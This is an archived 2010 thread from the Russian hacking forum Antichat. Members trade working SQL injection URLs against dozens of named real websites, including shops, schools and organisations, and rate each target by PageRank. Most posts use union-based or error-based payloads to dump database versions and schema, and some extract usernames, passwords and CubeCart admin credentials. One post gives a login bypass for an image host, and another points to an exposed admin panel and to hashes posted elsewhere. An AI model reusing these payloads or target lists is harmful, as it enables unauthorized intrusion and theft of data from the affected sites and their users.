HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #12741  
Старый 17.08.2010, 01:27
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

http://www.digitalcarversguild.com/plugin.php?ProductId=-18+union+select+1,version(),3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21--

http://www.maverickentertainment.cc/filmdetail.php?ProductID=724+and+ascii(lower(subst ring(user(),1,1)))=109

http://www.eonclash.com/ViewProduct.php?ProductID=-26+union+select+1,2,concat(username,char(58),user_ password),4,5,6,7,8+from+users
 
Ответить с цитированием

  #12742  
Старый 17.08.2010, 02:26
Мор0к
Guest
Сообщений: n/a
Провел на форуме:
2633

Репутация: 1
По умолчанию

PR5

http://www.rtuni.org/extendedschools/page.php?page_id=-1+union+select+1,2,3,4,5,6,7,version(),9--

Database Version: 5.0.90-community

Database name: bbritton_rtu

User name: bbritton_root@localhost
 
Ответить с цитированием

  #12743  
Старый 17.08.2010, 08:14
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

http://www.positivenetworks.com/page.php?pageID=3'+or+(1,1)=(select+count(0),conca t((select+table_name+from+information_schema.table s+where+table_name=(select+table_name+from+informa tion_schema.tables+where+table_rows>ascii(lower(su bstring(version(),1,1)))limit+0,1)+limit+0,1),floo r(rand(0)*2))from(information_schema.tables)+group +by+2)--+
 
Ответить с цитированием

  #12744  
Старый 17.08.2010, 12:00
av1
Участник форума
Регистрация: 06.10.2008
Сообщений: 165
Провел на форуме:
355997

Репутация: 66
Отправить сообщение для av1 с помощью ICQ
По умолчанию

Код:
Code:
http://www.inab.org/?option=com_projects&Itemid=62&idProyecto=-336+UNION+SELECT+1,2,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
Version: 5.0.22-Debian_0ubuntu6.06.2-log

Database: personal

Username: inb@localhost

Google PR: 5
 
Ответить с цитированием

  #12745  
Старый 17.08.2010, 12:02
-PRIVAT-
Участник форума
Регистрация: 17.04.2010
Сообщений: 221
Провел на форуме:
344917

Репутация: 17
По умолчанию

Цитата:
Сообщение от None  
http://www.erreh.it/oldnews.php?ID=-4+union+select+version%28%29%20+--+
PR 1

Цитата:
Сообщение от None  
http://www.faeton.spb.ru/news.php?menuitem=-115+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4 --
ТИЦ 60 PR 3

Цитата:
Сообщение от None  
http://www.tennisinfo.ru/news.php?newsid=-7036+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3 +--+
ТИЦ 80 PR 3

Цитата:
Сообщение от None  
http://topblogi.ru/news.php?newsid=-23+union+select+1,2,3,4,5,6,7,8,9,10 --
ТИЦ 10 PR 4

Цитата:
Сообщение от None  
http://www.aero-premium.ru/news.php?newsid=-90+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4%20--
ТИЦ 80 PR 2

Цитата:
Сообщение от None  
http://www.rsijournal.net/time.php?id=-25+union+select+group_concat%28table_name%29+from+ information_schema.tables%20+--+
PR 3

Цитата:
Сообщение от None  
http://sts-austria.com/tovar.php?tovarid=-27+union+select+1,2,3,4,5%20--
ТИЦ 20 PR 2

Шоп
 
Ответить с цитированием

  #12746  
Старый 17.08.2010, 14:29
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

http://youronesourcefitness.com/trainers.php?id=30+union+select+concat_ws(0x3a,@@v ersion,@@version_compile_os,@@version_comment,@@ve rsion_compile_machine),2,3,4,5,6,7,8,9,10,1,2,3,4, 5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8, 9,10,1,2

http://www.limelight-software.com/article.php?id=-59+union+select+1,2,aes_decrypt(aes_encrypt(versio n(),1),1),4,5,6,7

http://www.yangdentalgroup.net/nl/article.php?id=1512;select+version()::int,null,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null&type=col

http://www.unitedpurpose.org/archive/article.php?id=100+union+select+1,2,3,4,5,6,group_ concat(table_name),8,9,10,11,12,13+from+informatio n_schema.`tables`+where+table_schema=database()

http://www.duesseldorf.feg.de/static/sebalu2/article.php?id=-48+union+select+1,2,3,4,5,6,7,8,9

http://www.israel-diaspora.info/article.php?id=-853+union+select+1,2,version(),4,5,6,7,8,9,10,11,1 2,13

http://www.eleganthomesinwesttoronto.com/ShowResources.cfm?Pageid=(select+top+1+table_name+ from+information_schema.tables)&TypeOfPage=2

http://www.musicforpercussion.com/php/NewsDetail.php?ID=-130+union+select+1,2,3,4,version(),6,7,8,9,10,11,1 2,13,14--

http://www.odessachamber.com/newsdetail.php?id=14'+or+(1,1)=(select+count(0),co ncat((select+version()+from+information_schema.tab les+limit+0,1),floor(rand(0)*2))from(information_s chema.tables)+group+by+2)--+

http://www.dkggroup.com/newsdetail.php?id=165+or+(1,1)=(select+count(0),co ncat((select+version()+from+information_schema.tab les+limit+0,1),floor(rand(0)*2))from(information_s chema.tables)+group+by+2)--+

http://www.tango04.com/news/newsdetail.php?id=-361+union+select+1,version(),3,4,5,6,7,8,9,10,11,1 2,13

http://www.dutchtub.com/english00/newsdetail.php?id=-207+union+select+1,2,version(),4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32,33,34&titel=eco_gadget_of_the_year!

http://www.marmoon.com/games.php?id=-437+union+select+1,2,3,version(),5,6,7,8,9,10,11,1 2,13

http://www.dakamericas.com/newsdetail.php?id=19'+or+(1,1)=(select+count(0),co ncat((select+version()+from+information_schema.tab les+limit+0,1),floor(rand(0)*2))from(information_s chema.tables)+group+by+2)--+

http://www.bathfringe.co.uk/page.php?pageid=38+union+select+1,2,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 ,27,28,29,30,31&PHPSESSID='2ebe0d1ced95240449e5f9e c7bb9219c
 
Ответить с цитированием

  #12747  
Старый 18.08.2010, 00:10
Unknown
Guest
Сообщений: n/a
Провел на форуме:
6079

Репутация: 9
По умолчанию

Код:
Code:
http://www.iccu.sbn.it/genera.jsp?id=-1+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by++concat(mid(version(),1,63),+floor(rand(0)*2)))--+
PR - 7

ps. кому не лень, можете и докрутить ;-)


Небольшой хостинг картинок

Код:
Code:
http://pixca.ru/login.php
sql inj в POST данных. логика запроса SELECT * FROM ??? WHERE (login = '#login#') and (password = '#password#').

можно зайти под любым пользователем : D

l: #login#') or 1=1#

p: put smth here
 
Ответить с цитированием

  #12748  
Старый 18.08.2010, 03:18
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

http://www.eonclash.com/ViewProduct.php?ProductID=27+and+substring(version (),1,1)=4

http://www.rdmarket.ru/index.php?productID=1492'+or+(1,1)=(select+count(0 ),concat((select+version()+from+information_schema .tables+limit+17,1),floor(rand(0)*2))from(informat ion_schema.tables)+group+by+2)--+

http://stroymag.kiev.ua/index.php?productID=342+or+(1,1)=(select+count(0), concat((select+version()+from+information_schema.c olumns+limit+0,1),floor(rand(0)*2))from(informatio n_schema.tables)+group+by+2)--+

http://www.vk4ajj.com/cubecart/index.php?_a=viewProd&productId=342+or+(1,1)=(sele ct+count(0),concat((select+password+from+CubeCart_ admin_users+limit+0,1),floor(rand(0)*2))from(infor mation_schema.tables)+group+by+2)--+

(http://www.vk4ajj.com/cubecart/modules/3rdparty/Estelles_Mod_Store/css/php.ini)

http://www.eventphotocards.com/index.php?_a=viewProd&productId=342+or+(1,1)=(sele ct+count(0),concat((select+version()+from+informat ion_schema.tables+limit+0,1),floor(rand(0)*2))from (information_schema.tables)+group+by+2)--+
 
Ответить с цитированием

  #12749  
Старый 18.08.2010, 03:31
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404

Репутация: 564
Отправить сообщение для shell_c0de с помощью ICQ Отправить сообщение для shell_c0de с помощью AIM
По умолчанию

Шоп

http://www.fitshop.de/de/kategorie/riegel/18/index.html?br[0]=4+and+row(1,2)in(select+count(*),concat((select+c oncat(table_name,0x3a,column_name)+from+informatio n_schema.columns+where+column_name+like+0x25706173 7325+limit+1,1),0x3a,floor(rand(0)*2))as+a+from+in formation_schema.columns+x+group+by+a)

Script: /de/kategorie/riegel/18/index.html?

http://fitshop.de/sqladmin/

хеши в соседном разделе.
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
 
Ответить с цитированием

  #12750  
Старый 18.08.2010, 03:37
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

продолжаем шопы

http://www.gskpiter.ru/index.php?productID=36+or+(1,1)=(select+count(0),c oncat((select+version()+from+information_schema.ta bles+limit+0,1),floor(rand(0)*2))from(information_ schema.tables)+group+by+2)--+
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ